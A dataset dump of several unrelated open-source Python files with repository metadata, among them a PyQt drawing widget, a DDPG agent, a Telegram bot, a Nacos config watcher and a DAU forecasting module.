uic.loadUi('Ui.ui', self)
self.do_paint = False
self.pushButton.clicked.connect(self.run)
def paintEvent(self, event):
if self.do_paint is True:
qp = QPainter()
qp.begin(self)
self.draw(qp)
qp.end()
def run(self):
self.do_paint = True
self.repaint()
def draw(self, qp):
qp.setBrush(QColor(237, 255, 33))
r = randint(1, 299)
qp.drawEllipse(30, 120, r, r)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = MyWidget()
ex.show()
sys.exit(app.exec_()) | Dathator/Git- | main.py | main.py | py | 870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "PyQt5.uic.loadUi",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PyQt5.uic",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtGui.QPa... |
74469828583 | #! /usr/bin/env python3
import logging
import os
import tempfile
log = logging.getLogger(__name__)
def download_to_disk(config, object_ref):
log.debug('Moving file from {} to temporary file'.format(object_ref))
fd, path = tempfile.mkstemp(os.path.splitext(object_ref)[-1])
os.write(fd, open(object_ref, 'rb').read())
os.close(fd)
return path
| mabruras/sqapi | src/sqapi/query/content/disk.py | disk.py | py | 367 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "tempfile.mkstemp",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.splitext",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
21821135553 | # F*ck implementation problems
# Ab to kaam hoja bsdk
# Adding comments so it might be helpful to someone
## Moral: Don't watch IPL during contest
from collections import Counter
for _ in range(int(input())):
n = int(input())
lis = list(map(int, input().split()))
## Check for NO condition
counter = Counter(lis)
if len(counter) <= 1:
print("NO")
continue
print("YES")
oneWala = [1] # Every index a[0]!=a[idx]
othersWala = [] # if equals then it cannot be in oneWala
for i in range(1, n):
if lis[i] != lis[0]:
oneWala.append(i + 1)
else:
othersWala.append(i + 1)
## We need to have atleast one edge from oneWala to othersWala
## So check diff element in oneWala to connect to othersWala element
flag = 0
idx = -1
for i in oneWala:
for j in othersWala:
if lis[i - 1] != lis[j - 1]:
idx = i-1
flag = 1
break
if flag:
break
## Now connect everything in oneWala to 1
for i in oneWala:
if i != 1:
print(1, i)
if len(othersWala) == 0:
continue
## Now connect everything in othersWala to othersWala[0]
for i in othersWala:
print(idx + 1, i)
| sainad2222/my_cp_codes | codeforces/1433/D.py | D.py | py | 1,155 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 10,
"usage_type": "call"
}
] |
70123922664 | #! /usr/bin/env python
from sortrobot.mech import Robot
from sortrobot.webcam import Camera
from sortrobot.neural import Classifier, OrientationClassifier
from sortrobot.utils import random_filename
import numpy as np
from PIL import Image
import sys, random, os
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-o", "--outdir", dest="outdir", default='/home/pi/scans',
help="Directory to write sorted scans.")
parser.add_option("-c", "--classifier", dest="classifier", default='orient',
help="Classifier from sortrobot.neural to use.")
opts, args = parser.parse_args(sys.argv[1:])
directory = opts.outdir
assert os.path.exists(directory)
classifier = {
'orient': OrientationClassifier,
'color': Classifier,
}[opts.classifier]()
#DEFAULT_ORDER = 'black,blue,green mana back red,white,other'
DEFAULT_ORDER = 'top_front top_back bot_back bot_front'
order = ' '.join(args)
sr = Robot()
cam = Camera()
MAXITER = 500
while True:
if len(order.split()) != 4:
order = input('Enter a valid order [DEFAULT %s]: ' % DEFAULT_ORDER)
order = order.strip()
if len(order) == 0:
order = DEFAULT_ORDER
if input('Confirm order "%s" [Y/n]? ' % order).strip().lower() == 'n':
order = ''
continue
print('Using order:', order)
DEFAULT_ORDER = order # save for next time
POSITIONS = {}
for pos,arg in enumerate(order.split()):
for label in arg.split(','):
POSITIONS[label] = pos
def go(pos):
if type(pos) is str:
try:
pos = POSITIONS[label]
except(KeyError):
print(' label %s has no position! Choosing 0.' % label)
pos = 0
sr.go(pos)
for i in range(MAXITER):
filebase = random_filename()
filename = os.path.join(directory, filebase)
print('%d scanning -> %s' % (i, filename))
cam.rgb_to_file(filename)
im = Image.open(filename)
label = classifier.classify(im)
print(' classfied as %s' % (label))
new_directory = os.path.join(directory, label)
if not os.path.exists(new_directory):
os.mkdir(new_directory)
print(' moving to %s' % (new_directory))
os.rename(filename, os.path.join(new_directory, filebase))
if label == 'empty':
break
go(label)
sr.feed_card()
order = '' # triggers prompt for input at top of loop
| AaronParsons/sortrobot | scripts/sr_neural_sort.py | sr_neural_sort.py | py | 2,532 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "optparse.OptionParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
471364125 | # Adapted from https://github.com/mimoralea/gdrl
from helpers.utils.action_selection import GreedyStrategy, NormalNoiseStrategy
from helpers.utils.priority_replay import Memory
from helpers.nn.network import FCQV, FCDP
from itertools import count
import torch.optim as optim
import numpy as np
import torch
import time
import glob
import os
import gc
LEAVE_PRINT_EVERY_N_SECS = 300
RESULTS_DIR = os.path.join('..', 'results')
ERASE_LINE = '\x1b[2K'
class DDPG_agent:
def __init__(self, policy_info={}, value_info={}, env_info={}, training_info={}, buffer_info={}):
# set device target
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
### POLICY NETWORK PARAMETERS
self.online_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
policy_info["hidden_dims"], device=self.device)
self.target_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
policy_info["hidden_dims"], device=self.device)
self.policy_optimizer = optim.Adam(self.online_policy_model.parameters(), lr=policy_info["learning_rate"])
self.policy_max_grad_norm = policy_info["max_grad_norm"]
### VALUE NETWORK PARAMETERS
self.online_value_model = FCQV(env_info["state_size"], env_info["action"],
value_info["hidden_dims"], device=self.device)
self.target_value_model = FCQV(env_info["state_size"], env_info["action"],
value_info["hidden_dims"], device=self.device)
self.value_optimizer = optim.Adam(self.online_value_model.parameters(), lr=value_info["learning_rate"])
self.value_max_grad_norm = value_info["max_grad_norm"]
# TRAINING AND EVALUATION STRATEGY
self.training_strategy = NormalNoiseStrategy(env_info["bounds"], training_info["exploration_noise_ratio"])
self.update_target_every_steps = training_info["update_every_step"]
self.evaluation_strategy = GreedyStrategy(env_info["bounds"])
self.n_warmup_batches = training_info["n_warmup_batches"]
self.soft_weight_tau = training_info.get("weight_mix_ratio", None)
# MEMORY INITIALIZATION
self.replay_buffer = Memory(capacity=buffer_info["size"], seed=training_info["seed"])
self.batch_size = buffer_info["batch_size"]
# seed
torch.manual_seed(training_info["seed"]);
self.rand_generator = np.random.RandomState(training_info["seed"])
# lower and upper action value bounds
self.low_bounds, self.high_bounds = env_info["bounds"]
def prepopulate(self, brain_name, env):
"""
First thing called after environment has been setup
To aviod the empty memory problem we randomly pre populate the memory. This is done
by taking random actions and storing them as experiences
Args:
brain_name: (string) name of agent we are using
env: (object) Environment we are operating in
"""
# flag for when to reset the environment [when we hit a terminal state]
reset_check, last_state = False, None
for idx in range(self.replay_buffer.tree.capacity):
# if idx is the first step get state or we have to reset
if idx == 0 or reset_check:
# change reset check back to false
reset_check = False
# resent environment and extract current state
env_info = env.reset(train_mode=True)[brain_name]
last_state = env_info.vector_observations[0]
# take random actions within acceptable bounds
action = self.rand_generator.uniform(low=self.low_bounds,
high=self.high_bounds,
size=len(self.high_bounds))
# take the action, recod reward, and terminal status
env_info = env.step(action)[brain_name]
reward = env_info.rewards[0]
done = env_info.local_done[0]
# checking status
if done:
# set reset flag
reset_check = True
state = np.zeros(last_state.shape)
# store in replay
self.replay_buffer.store(last_state, action, reward, state, done)
else:
# get next state from the environment
state = env_info.vector_observations[0]
# store in replay
self.replay_buffer.store(last_state, action, reward, state, done)
# update state
last_state = state
def update_networks(self, tau=0.1):
tau = self.soft_weight_tau if self.soft_weight_tau is not None else tau
# copy value model
for target, online in zip(self.target_value_model.parameters(),
self.online_value_model.parameters()):
target_ratio = (1.0 - tau) * target.data
online_ratio = tau * online.data
mixed_weights = target_ratio + online_ratio
target.data.copy_(mixed_weights)
# copy policy model
for target, online in zip(self.target_policy_model.parameters(),
self.online_policy_model.parameters()):
target_ratio = (1.0 - tau) * target.data
online_ratio = tau * online.data
mixed_weights = target_ratio + online_ratio
target.data.copy_(mixed_weights)
def load(self, states, actions, rewards, next_states, is_terminals):
# convert to torch tensors
states = torch.from_numpy(states).float().to(self.device)
actions = torch.from_numpy(actions).float().to(self.device)
next_states = torch.from_numpy(next_states).float().to(self.device)
rewards = torch.from_numpy(rewards).float().to(self.device)
is_terminals = torch.from_numpy(is_terminals).float().to(self.device)
# returns tensors
return states, actions, rewards, next_states, is_terminals
def optimize_model(self):
# priotized replay used so we can update optimize on the go: we get the batch indexes, memory,
# importance sampling
idx_batch, memory_batch, ISweights = self.replay_buffer.sample_per(self.batch_size)
# convert sampling weights to tensor
ISweights = torch.from_numpy(ISweights).float().to(self.device)
# unwrap
states, actions, rewards, next_states, is_terminals = self.replay_buffer.unwrap_experiences(memory_batch)
# convert to torch
states, actions, rewards, next_states, is_terminals = self.load(states, actions, rewards, next_states, is_terminals)
## Target policy
# get maximum policy over all states
argmax_a_q_sp = self.target_policy_model(next_states)
# calculate the q values corresponding to the policy above
max_a_q_sp = self.target_value_model(next_states, argmax_a_q_sp)
# calculate the TD target q_state action values
target_q_sa = rewards + self.gamma * max_a_q_sp * (1 - is_terminals)
## Online value
# for each state action pair we calculate the q_values
q_sa = self.online_value_model(states, actions)
## Loss calculations
td_error_loss = q_sa - target_q_sa.detach()
# calculate absolute error: convert to numpy
abs_error = torch.abs(td_error_loss).cpu().detach().numpy()
# update PER
self.replay_buffer.batch_update(idx_batch, abs_error.squeeze())
# calculate value loss using weight mean square error
value_loss = (ISweights * td_error_loss).mul(0.5).pow(2).mean()
# zero optimizer, do a backward pass, clip gradients, and finally optimizer
self.value_optimizer.zero_grad()
value_loss.backward()
torch.nn.utils.clip_grad_norm_(self.online_value_model.parameters(),
self.value_max_grad_norm)
self.value_optimizer.step()
## ONLINE POLICY
argmax_a_q_s = self.online_policy_model(states)
max_a_q_s = self.online_value_model(states, argmax_a_q_s)
## calculate loss using weighted mean
policy_loss = -(ISweights * max_a_q_s).mean()
self.policy_optimizer.zero_grad()
policy_loss.backward()
torch.nn.utils.clip_grad_norm_(self.online_policy_model.parameters(),
self.policy_max_grad_norm)
self.policy_optimizer.step()
def interaction_step(self, last_state, env, brain_name):
# initially we randomly explore the sample space
check = self.replay_buffer.current_storage_size < self.n_warmup_batches * self.batch_size
action = self.training_strategy.select_action(self.online_policy_model, last_state, check)
# get environment values
env_info = env.step(action)[brain_name]
state = env_info.vector_observations[0]
reward = env_info.rewards[0]
done = env_info.local_done[0]
# store into replay buffer
self.replay_buffer.store(last_state, action, reward, state, done)
# update tracking parameters
self.episode_reward[-1] += reward
self.episode_timestep[-1] += 1
self.episode_exploration[-1] += self.training_strategy.ratio_noise_injected
# return values
return state, done
def train(self, env, brain_name, gamma, max_minutes, max_episodes, goal_mean_100_reward):
# initialize tracking parameters
self.episode_timestep = []
self.episode_reward = []
self.episode_seconds = []
self.evaluation_scores = []
self.episode_exploration = []
self.gamma = gamma
# loop parameters
total_steps = 0
training_time = 0
training_start, last_debug_time = time.time(), float("-inf")
# storage for results
results = np.empty((max_episodes, 5))
results[:] = np.nan
# start training loop
for episode in range(1, max_episodes + 1):
# episode start tick
episode_start = time.time()
# refresh environment
state = env.reset(train_mode=True)[brain_name].vector_observations[0]
is_terminal = False
self.episode_reward.append(0.0)
self.episode_timestep.append(0.0)
self.episode_exploration.append(0.0)
for step in count():
state, is_terminal = self.interaction_step(state, env, brain_name)
# after making random steps
check = self.replay_buffer.current_storage_size > (self.n_warmup_batches * self.batch_size)
if check:
# run optimization
self.optimize_model()
# updates every episode
if np.sum(self.episode_timestep) % self.update_target_every_steps == 0:
self.update_networks()
if is_terminal:
gc.collect()
break
# stat tracking
episode_elapsed = time.time() - episode_start
self.episode_seconds.append(episode_elapsed)
training_time += episode_elapsed
evaluation_score, _ = self.evaluate(self.online_policy_model, env, brain_name)
self.save_checkpoint(episode - 1, self.online_policy_model)
total_steps = int(np.sum(self.episode_timestep))
self.evaluation_scores.append(evaluation_score)
# mean and std calculations
mean_10_reward = np.mean(self.episode_reward[-10:])
std_10_reward = np.std(self.episode_reward[-10:])
mean_100_reward = np.mean(self.episode_reward[-100:])
std_100_reward = np.std(self.episode_reward[-100:])
mean_100_eval_score = np.mean(self.evaluation_scores[-100:])
std_100_eval_score = np.std(self.evaluation_scores[-100:])
lst_100_exp_rat = np.array(self.episode_exploration[-100:]) / np.array(self.episode_timestep[-100:])
mean_100_exp_rat = np.mean(lst_100_exp_rat)
std_100_exp_rat = np.std(lst_100_exp_rat)
wallclock_elapsed = time.time() - training_start
results[episode - 1] = total_steps, mean_100_reward, mean_100_eval_score, \
training_time, wallclock_elapsed
reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS
# termination criteria check
reached_max_minutes = wallclock_elapsed >= max_minutes * 60
reached_max_episodes = episode >= max_episodes
reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward
training_over = reached_max_minutes or reached_max_episodes or reached_goal_mean_reward
# message string
elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start))
debug_message = 'el {}, ep {:04}, ts {:07}, '
debug_message += 'ar_10 ts {:05.1f} \u00B1 {:05.1f}, '
debug_message += 'ar_100 ts {:05.1f} \u00B1 {:05.1f}, '
debug_message += 'ex 100 {:02.1f} \u00B1 {:02.1f}, '
debug_message += 'ev {:05.1f} \u00B1 {:05.1f}'
debug_message = debug_message.format(elapsed_str, episode - 1, total_steps,
mean_10_reward, std_10_reward,
mean_100_reward, std_100_reward,
mean_100_exp_rat, std_100_exp_rat,
mean_100_eval_score, std_100_eval_score)
print(debug_message, flush=True)
if reached_debug_time or training_over:
print("Debug Message")
print(debug_message, flush=True)
last_debug_time = time.time()
if training_over:
if reached_max_minutes: print(u'--> reached_max_minutes \u2715')
if reached_max_episodes: print(u'--> reached_max_episodes \u2715')
if reached_goal_mean_reward: print(u'--> reached_goal_mean_reward \u2713')
break
# get score for last round
final_eval_score, score_std = self.evaluate(self.online_policy_model, env, brain_name, n_episodes=100)
wallclock_time = time.time() - training_start
print("Training complete.")
print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,'
' {:.2f}s wall-clock time.\n'.format(
final_eval_score, score_std, training_time, wallclock_time))
# close and delete the environment
env.close() ; del env
self.get_cleaned_checkpoints()
return results, final_eval_score, training_time, wallclock_time
def evaluate(self, eval_policy_model, eval_env, brain_name, n_episodes=1):
rs = []
for _ in range(n_episodes):
env_info = eval_env.reset(train_mode=True)[brain_name]
state, done = env_info.vector_observations[0], False
rs.append(0)
for _ in count():
action = self.evaluation_strategy.select_action(eval_policy_model, state)
env_info = eval_env.step(action)[brain_name]
state = env_info.vector_observations[0]
reward = env_info.rewards[0]
done = env_info.local_done[0]
rs[-1] += reward
if done: break
# return mean and standard deviation
return np.mean(rs), np.std(rs)
def save_checkpoint(self, episode_idx, model):
torch.save(model.state_dict(),
os.path.join("results", "checkpoint_models", 'model.{}.tar'.format(episode_idx)))
def get_cleaned_checkpoints(self, n_checkpoints=4):
try:
return self.checkpoint_paths
except AttributeError:
self.checkpoint_paths = {}
paths = glob.glob(os.path.join("results", "checkpoint_models", '*.tar'))
paths_dic = {int(path.split('.')[-2]): path for path in paths}
last_ep = max(paths_dic.keys())
checkpoint_idxs = np.linspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=np.int) - 1
for idx, path in paths_dic.items():
if idx in checkpoint_idxs:
self.checkpoint_paths[idx] = path
else:
os.unlink(path)
| Oreoluwa-Se/Continuous-Control | helpers/agent.py | agent.py | py | 16,852 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
... |
34341824103 | # -*- coding: utf-8 -*-
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import MessageHandler, Filters
from telegram.ext.dispatcher import run_async
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton
import telegram
from emoji import emojize, demojize
from commands import *
from commands.libs.decorators import commands, descriptions
from commands.libs.history import add_history
from commands.general import cmd_start
from settings import *
from tools.text import analyze_text
from tools.libs import *
from shared import save_data, clean_data
import random, logging, os, sys, atexit, threading
# Set up basic logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
@atexit.register
def final_handler():
print("Stop")
# Gestion des taches planifié
# bot = telegram.Bot(token=token)
# def doAction():
# bot.sendMessage(chat_id="TODO", text="Test")
# threading.Timer(60, doAction).start()
# doAction()
@run_async
def start(bot, update, args):
# Sauvegarde de l’id du nouveau client.
attrs = make_attrs_from_telegram(update, bot, args, {})
cmd_start(attrs)
@run_async
def commands_handler(bot, update, args, no_fail_reply=False, attrs=None):
try:
if not attrs:
attrs = make_attrs_from_telegram(update, bot, args, {})
else:
bot = attrs["telegram"]["bot"]
update = attrs["telegram"]["update"]
args = attrs["telegram"]["args"]
commande = get_probable_command(update.message.text, bot.name)
# Si c’est en mode « Salon », alors l’historique est enregistré
# pour le salon sinon c’est pour le pseudo de l’utilisateur
if commande:
add_history(pseudo=username_or_channel(attrs), command="{0} {1}".format(commande, attrs["query"]))
else:
add_history(pseudo=username_or_channel(attrs), command=update.message.text)
if commande in commands:
if no_fail_reply == False:
# Si pas de réponse en cas d’erreur, on indique jamais que laurence écrit
bot.sendChatAction(chat_id=update.message.chat_id, action="typing")
# Execution de la commande en question
retour = commands[commande](attrs)
# Réponse
if retour != "" and retour is not None:
if type(retour) is not str:
retour = " ".join(retour)
retour = emojize(retour)
bot.sendMessage(chat_id=update.message.chat_id, text=retour, reply_markup=ReplyKeyboardRemove(),
parse_mode="Markdown")
# update.message.reply_text(retour, reply_markup=ReplyKeyboardRemove())
elif no_fail_reply == False:
# Cas d’erreur uniquement si on est dans le cas ou l’on doit pas répondre en cas d’erreur
update.message.reply_text(
"Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
reply_markup=ReplyKeyboardRemove())
except Exception as e:
print(e)
import traceback
traceback.print_exc()
@run_async
def text_handler(bot, update):
update.message.text = update.message.text.replace(bot.name, "").lstrip()
attrs = analyze_text(bot, update, do_google_search=is_private_channel(update))
commands_handler(None, None, None, True, attrs=attrs)
@run_async
def location_handler(bot, update):
args = update.message.text.split(' ')
update.message.text = "/proche"
commands_handler(bot, update, args[1:], no_fail_reply=True)
@run_async
def voice_handler(bot, update):
update.message.reply_text(
emojize("Très jolie voix ! Mais je ne comprend pas encore la parole :cry:.", use_aliases=True),
reply_markup=ReplyKeyboardRemove())
def unknown_handler(bot, update):
update.message.reply_text(
"Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
reply_markup=ReplyKeyboardRemove())
def register_slash_commands():
for command in commands:
dispatcher.add_handler(CommandHandler(command, commands_handler, pass_args=True))
def error(bot, update, error):
logging.warn('Update "%s" caused error "%s"' % (update, error))
if __name__ == '__main__':
token = os.getenv('LAURENCE_TOKEN')
if not token:
logging.critical('Token absent')
sys.exit()
updater = Updater(token=token)
dispatcher = updater.dispatcher
dispatcher.add_handler(CommandHandler('start', start, pass_args=True))
register_slash_commands()
# Gestion du text comme commande (Temporaire)
dispatcher.add_handler(MessageHandler(Filters.text, text_handler))
# Gestion des envois type « position »
dispatcher.add_handler(MessageHandler(Filters.location, location_handler))
# Gestion des envois type « Voice »
dispatcher.add_handler(MessageHandler(Filters.voice, voice_handler))
# log all errors
dispatcher.add_error_handler(error)
print("Laurence is ready.")
updater.start_polling()
| c4software/laurence-bot | telegram_start.py | telegram_start.py | py | 5,247 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "atexit.register",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "commands.g... |
31608746342 | import torch
from torch import nn
from torch.autograd import Variable
class topk_crossEntrophy(nn.Module):
def __init__(self, top_k=0.7):
super(topk_crossEntrophy, self).__init__()
self.loss = nn.NLLLoss()
self.top_k = top_k
self.softmax = nn.LogSoftmax()
return
def forward(self, input, target):
softmax_result = self.softmax(input)
loss = Variable(torch.Tensor(1).zero_()).cuda()
for idx, row in enumerate(softmax_result):
gt = target[idx]
pred = torch.unsqueeze(row, 0)
gt = torch.unsqueeze(gt, 0)
cost = self.loss(pred, gt)
loss = torch.cat((loss, cost.unsqueeze(0)), 0)
loss = loss[1:]
if self.top_k == 1:
valid_loss = loss
index = torch.topk(loss, int(self.top_k * loss.size()[0]))
valid_loss = loss[index[1]]
return torch.mean(valid_loss) | Forrest0503/VAT-ABAW | ohem_loss.py | ohem_loss.py | py | 987 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.NLLLoss",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
26281206663 | #!/usr/bin/env python3
# coding:utf-8
import os,hashlib
import shutil
import subprocess
from datetime import datetime
import nacos
import yaml
from apscheduler.schedulers.blocking import BlockingScheduler
from dotenv import load_dotenv, find_dotenv
# load .env file
load_dotenv(find_dotenv(), override=True)
SERVER_ADDRESSES = os.getenv("nacos_server")
NAMESPACE = os.getenv("nacos_namespace_id")
USERNAME = os.getenv("nacos_suth_user")
PASSWORD = os.getenv("nacos_auth_passwd")
# auth mode
client = nacos.NacosClient(SERVER_ADDRESSES, namespace=NAMESPACE, username=USERNAME, password=PASSWORD)
client.set_options(callback_thread_num=1)
class Watcher():
def __init__(self):
self.cf = cf
def run(self):
for p in self.cf['configs']:
self.cf_path = p['path']
self.watch(id=p['id'], group=p['group'])
def file_md5(self, file_path):
with open(file_path, 'rb') as file:
f = file.read()
m = hashlib.md5()
m.update(f)
return m.hexdigest()
def print_cm(self, status):
snapshot_file = "{0}+{1}+{2}".format(status['data_id'], status['group'], NAMESPACE)
for p in self.cf['configs']:
if status['data_id'] == p['id'] and status['group'] == p['group']:
if self.file_md5("nacos-data/snapshot/{}".format(snapshot_file)) != self.file_md5(p['path']):
shutil.copyfileobj(open("nacos-data/snapshot/{}".format(snapshot_file), "rb"), open(p['path'], "wb"))
s, r = subprocess.getstatusoutput(p['command'])
if int(s) != 0:
print("命令执行失败:{}".format(p['command']))
return True
def watch(self, id, group):
client.add_config_watcher(id, group, self.print_cm)
if __name__ == '__main__':
# 传入配置
with open('config.yaml', 'r+') as f:
cf = yaml.load(f)
# # 常驻调度任务
scheduler = BlockingScheduler()
job = Watcher()
# 每隔1分钟执行一次 job_func;
scheduler.add_job(job.run, 'interval', minutes=1)
try:
print("{0} nacos watch the process start".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
scheduler.start()
except (KeyboardInterrupt, SystemExit):
print("{0} nacos watch the process exit".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
scheduler.shutdown()
| GounGG/nacos-client-py | nacos-get-config.py | nacos-get-config.py | py | 2,424 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dotenv.find_dotenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line... |
42215123133 | import json
import os
import datetime
import scipy.optimize
import sklearn.metrics
import aop
import aop.api
class DailyIndexPrediction:
def __init__(self):
# read the config.json in the current directory
with open(os.path.dirname(__file__) + '/config.json', 'r') as file_obj:
self.config = json.load(file_obj)
# set gateway domain name
aop.set_default_server('gateway.open.umeng.com')
# set apiKey and apiSecurity
aop.set_default_appinfo(self.config['api_key'],
self.config['api_security'])
self.factor = 54
self.dnu = list()
self.retention = list()
self._set_dnu_data()
self._set_retention_data()
def _get_retention_rate(self):
"""support 7-days average retention at most"""
# setup the start and end date of the retention request
start_date = datetime.datetime.now().date() + datetime.timedelta(days=-37)
end_date = datetime.datetime.now().date()
# build request
req = aop.api.UmengUappGetRetentionsRequest()
# send api request
try:
resp = req.get_response(None,
appkey=self.config['app_key'],
startDate=str(start_date),
endDate=str(end_date),
periodType='daily'
)
except aop.ApiError as e:
print('Exception returned by API gateway:', e)
except aop.AopError as e:
print('Exception before client API gateway request:', e)
except Exception as e:
print('Other unknown exceptions:', e)
# print(resp)
# extract retention rate info
retentions = [info['retentionRate'] for info in resp['retentionInfo']]
retentions.reverse()
return retentions
def _build_coordinate(self, avg_days=3):
retentions = self._get_retention_rate()
# umeng retention days
x_labels = [1, 2, 3, 4, 5, 6, 7, 14, 30]
y_labels = list()
for x in x_labels:
tmp_lst = []
for day in range(x-1, avg_days+x-1):
tmp_lst.append(retentions[day][x_labels.index(x)])
y_labels.append(sum(tmp_lst)/len(tmp_lst))
return x_labels, y_labels
def _curve_fitting(self):
x_labels, y_labels = self._build_coordinate()
def func(x, a, b):
return a * (x ** b)
popt, pcov = scipy.optimize.curve_fit(func, x_labels, y_labels)
# y_pred = [func(x, popt[0], popt[1]) for x in x_labels]
# r2 = sklearn.metrics.r2_score(y_labels, y_pred)
# print('coefficient of determination:', r2)
coefficient = popt[0]
exponent = popt[1]
return coefficient, exponent
def _set_retention_data(self):
"""notice: day must be greater than 0,
Calculate the retention according to the formula.
"""
coefficient, exponent = self._curve_fitting()
self.retention = [coefficient * (day ** exponent) / 100 for day in range(1, 181)]
def _update_dnu(self):
"""update dnu"""
with open(os.path.dirname(__file__) + '/dnu.json', 'r') as file_obj:
dnu_data = json.load(file_obj)
today = datetime.datetime.now().date()
last_date = max(dnu_data.keys())
last_date = datetime.datetime.strptime(last_date, '%Y-%m-%d').date()
if (today - last_date).days == 1:
pass
else:
# update dnu
start_date = last_date + datetime.timedelta(days=1)
end_date = today - datetime.timedelta(days=1)
# send api request
req = aop.api.UmengUappGetNewAccountsRequest()
try:
resp = req.get_response(None,
appkey=self.config['app_key'],
startDate=str(start_date),
endDate=str(end_date)
)
except aop.ApiError as e:
print('Exception returned by API gateway:', e)
except aop.AopError as e:
print('Exception before client API gateway request:', e)
except Exception as e:
print('Other unknown exceptions:', e)
resp = resp['newAccountInfo']
for i in resp:
dnu_data[i['date']] = i['newUser']
with open(os.path.dirname(__file__) + '/dnu.json', 'w') as file_obj:
json.dump(dnu_data, file_obj, indent=8)
return dnu_data
def _set_dnu_data(self):
dnu_data = self._update_dnu()
dnu_lst = list()
today = datetime.datetime.now().date()
date_index = today
date_index -= datetime.timedelta(days=1)
for i in range(180):
dnu_lst.append(dnu_data[str(date_index)])
date_index -= datetime.timedelta(days=1)
self.dnu = dnu_lst
def test(self, days, goal):
self._set_dnu_data()
self._set_retention_data()
print(self.retention)
print(sum(self.retention[:6]))
# print(sum(self.retentions[:3]))
# print(sum([i[0]*i[1] for i in zip(self.retentions[24:self.factor], self.dnu[24:self.factor])]))
# r_sum = sum(self.retentions[:days-1]) + 1
# dnu_each_day = goal / r_sum
# print()
# print('GOAL: {} DAU in {} days.'.format(goal, days))
# print('You need on average {} new users everyday.'.format(round(dnu_each_day), days))
# print('The total number of new users in {} day[s] is {}.'.format(days, round(dnu_each_day)*days))
# print('The total customer acquisition cost of {} new users is ¥{}.'.format(round(dnu_each_day)*days, round(dnu_each_day)*days*0.65))
def dau_prediction(self, data_payload):
"""
{
"is_avg_dnu": 1,
"dnu_data": {
"goal_each_day": 10000,
"target_date": "2020-11-24"
}
}
{
"is_avg_dnu": 0,
"dnu_data": {
"2020-11-21": 5000,
"2020-11-22": 6000,
"2020-11-23": 7000,
"2020-11-24": 8000
}
}
"""
# average DNU
if int(data_payload['is_avg_dnu']):
# extract data
dnu_each_day = int(data_payload['dnu_data']['goal_each_day'])
target_date = data_payload['dnu_data']['target_date']
# calc timedelta
target_date = datetime.datetime.strptime(target_date, '%Y-%m-%d').date()
current_date = datetime.datetime.now().date()
timedelta = (target_date - current_date).days
# set dnu list
dnu_lst = self.dnu
dnu_lst[:0] = [dnu_each_day] * timedelta
dnu_lst = dnu_lst[:self.factor]
# set retention list
retention_lst = self.retention[:self.factor]
# calc ideal DAU
ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_each_day
ideal_dau = round(ideal_dau)
return '{dnu} new users for today and future {timedelta} day(s), you will reach {dau} active users on {date}'.format(dnu=dnu_each_day, timedelta=timedelta, dau=ideal_dau, date=str(target_date))
# custom DNU
else:
# extract data
dnu_data = data_payload['dnu_data']
last_date = max(dnu_data.keys())
# calc timedelta
timedelta = len(dnu_data.keys()) - 1
# set dnu list
dnu_lst = self.dnu
dnu_lst[:0] = reversed(list(dnu_data.values())[:timedelta])
dnu_lst = dnu_lst[:self.factor]
# set retention list
retention_lst = self.retention[:self.factor]
# calc ideal DAU
ideal_dau = sum([x*y for x, y in zip(dnu_lst, retention_lst)]) + dnu_data[last_date]
ideal_dau = round(ideal_dau)
return 'You will reach {dau} active users on {date}'.format(dau=ideal_dau, date=last_date)
